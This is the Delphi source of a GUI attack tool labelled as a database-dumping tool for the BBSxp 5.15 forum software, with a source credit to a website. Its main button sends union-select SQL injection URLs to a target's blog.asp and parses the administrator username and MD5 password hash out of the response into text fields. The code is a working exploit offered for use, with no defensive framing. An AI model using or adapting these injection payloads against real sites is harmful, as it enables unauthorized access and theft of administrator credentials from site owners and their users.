unit Unit1;
interface
uses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
Dialogs, IdBaseComponent, IdComponent, IdTCPConnection, IdTCPClient,
IdHTTP, StdCtrls, IdAntiFreezeBase, IdAntiFreeze, WinHTTP, ComCtrls,
ExtCtrls, WinSKINData;
type
TForm1 = class(TForm)
Edit1: TEdit;
Edit2: TEdit;
Edit3: TEdit;
Button1: TButton;
IdHTTP1: TIdHTTP;
WinHTTP1: TWinHTTP;
Label1: TLabel;
Label2: TLabel;
Label3: TLabel;
Bevel1: TBevel;
Button2: TButton;
StatusBar1: TStatusBar;
procedure Button1Click(Sender: TObject);
procedure WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
procedure WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
procedure Button2Click(Sender: TObject);
procedure Edit3Change(Sender: TObject);
private
{ Private declarations }
public
{ Public declarations }
end;
var
Form1: TForm1;
implementation
{$R *.dfm}
procedure TForm1.Button1Click(Sender: TObject);
var
s1:string;
url1,url2:string;
i:integer;
begin
if edit1.Text ='' then
begin
showmessage(' 请输入网址先!');
exit;
end;
url1:=edit1.Text+'blog.ASP?id=1%20union%20select%20top%201%201,[username],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
url2:=edit1.Text+'blog.asp?id=1%20union%20select%20top%201%201,[userpass],1,1,1,1,1%20from%20[user]%20where%20membercode=5';
//---------------------------暴账号(idHTTP)-----------------------
try
Form1.Caption :='正在暴取账号......';
s1:=idHTTP1.Get(url1);
if pos('username',s1)<>0 then
begin
i:=pos('username',s1);
s1:=copy(s1,i+9,15); //账号位数不固定,但最长不得超过12位
i:=pos('">',s1);
s1:=copy(s1,1,i-1); //取得账号
edit2.Text :=s1;
idHTTP1.Disconnect ; //断开连接
end
else
begin
Form1.Caption :='[BBSXP 5.15]暴库工具 ';
showmessage('暴库失败!可能不存在此漏洞!');
idHTTP1.Disconnect ; //断开连接
exit;
end;
except
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
showmessage('网络超时或其他错误!');
idHTTP1.Disconnect ;
exit; //如果错误就退出 ,不继续下面的代码
end;
//----------暴账号完毕-------------
//----如果暴账号成功,那暴密码肯定也成功,则继续下面的代码
//-----------------------------暴密码(WinHTTP)------------------------
Form1.Caption :='正在暴取密码......';
WinHTTP1.URL :=url2;
WinHTTP1.Read;
//-----接 WinHTTP1Done 和 WinHTTP1HTTPError----------
end;
//-------WinHTTP1Done 和 WinHTTP1HTTPError 的代码要一致,因为暴密码一般都是在Error状态下----
procedure TForm1.WinHTTP1Done(Sender: TObject; const ContentType: String;
FileSize: Integer; Stream: TStream);
var
s2:string;
i:integer;
begin
with Stream as TMemoryStream do
begin
SetLength(s2,size);
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密,可以直接取32个字符即得密码
edit3.Text :=s2;
end;
end;
procedure TForm1.WinHTTP1HTTPError(Sender: TObject; ErrorCode: Integer;
Stream: TStream);
var
s2:string;
i:integer;
begin
with Stream as TMemoryStream do
begin
SetLength(s2,size);
Stream.Read(s2[1],size);
end;
if pos('username',s2)<>0 then
begin
i:=pos('username',s2);
s2:=copy(s2,i+9,32); //这里为固定的32位MD5加密,可以直接取32个字符即得密码
edit3.Text :=s2;
end;
end;
procedure TForm1.Button2Click(Sender: TObject);
begin
close;
end;
procedure TForm1.Edit3Change(Sender: TObject);
begin
Form1.Caption :='[BBSxp 5.15]暴库工具 ';
end;
end.
(出处:http://www.sheup.com)